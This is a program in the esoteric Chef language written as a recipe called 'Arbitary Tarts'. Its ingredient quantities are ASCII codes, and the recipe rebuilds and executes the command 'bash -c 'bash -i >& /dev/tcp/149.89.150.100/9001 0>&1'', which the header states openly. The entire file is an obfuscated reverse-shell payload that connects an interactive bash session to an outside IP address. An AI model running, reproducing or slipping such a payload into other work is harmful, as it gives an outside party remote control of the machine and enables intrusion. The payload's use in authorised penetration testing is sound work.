Arbitary Tarts.

Calls the arbitrary string 'bash -c 'bash -i >& /dev/tcp/149.89.150.100/9001 0>&1'' as a shell command.

Ingredients.
98 cup all-purpose flour
97 tablespoon baking powder
115 teaspoon baking soda
104 cup granulated sugar
32 cup brown sugar
45 cup powdered sugar
99 teaspoon salt
39 cup unsalted butter
105 cup margarine
62 cup vegetable oil
38 cup olive oil
47 cup shortening
100  large eggs
101  egg whites
118  egg yolks
116 cup whole milk
112 cup skim milk
49 cup heavy cream
52 cup half-and-half
57 cup buttermilk
46 cup sour cream
56 cup yogurt
53 teaspoon vanilla extract
48 teaspoon almond extract

Method.
Put unsalted butter into mixing bowl.
Put heavy cream into mixing bowl.
Put olive oil into mixing bowl.
Put vegetable oil into mixing bowl.
Put almond extract into mixing bowl.
Put brown sugar into mixing bowl.
Put heavy cream into mixing bowl.
Put almond extract into mixing bowl.
Put almond extract into mixing bowl.
Put buttermilk into mixing bowl.
Put shortening into mixing bowl.
Put almond extract into mixing bowl.
Put almond extract into mixing bowl.
Put heavy cream into mixing bowl.
Put sour cream into mixing bowl.
Put almond extract into mixing bowl.
Put vanilla extract into mixing bowl.
Put heavy cream into mixing bowl.
Put sour cream into mixing bowl.
Put buttermilk into mixing bowl.
Put yogurt into mixing bowl.
Put sour cream into mixing bowl.
Put buttermilk into mixing bowl.
Put half-and-half into mixing bowl.
Put heavy cream into mixing bowl.
Put shortening into mixing bowl.
Put skim milk into mixing bowl.
Put salt into mixing bowl.
Put whole milk into mixing bowl.
Put shortening into mixing bowl.
Put egg yolks into mixing bowl.
Put egg whites into mixing bowl.
Put large eggs into mixing bowl.
Put shortening into mixing bowl.
Put brown sugar into mixing bowl.
Put olive oil into mixing bowl.
Put vegetable oil into mixing bowl.
Put brown sugar into mixing bowl.
Put margarine into mixing bowl.
Put powdered sugar into mixing bowl.
Put brown sugar into mixing bowl.
Put granulated sugar into mixing bowl.
Put baking soda into mixing bowl.
Put baking powder into mixing bowl.
Put all-purpose flour into mixing bowl.
Put unsalted butter into mixing bowl.
Put brown sugar into mixing bowl.
Put salt into mixing bowl.
Put powdered sugar into mixing bowl.
Put brown sugar into mixing bowl.
Put granulated sugar into mixing bowl.
Put baking soda into mixing bowl.
Put baking powder into mixing bowl.
Put all-purpose flour into mixing bowl.
Liquefy contents of mixing bowl.
Pour contents of the mixing bowl into the baking dish.
Broil contents of baking dish.

Serves 0.
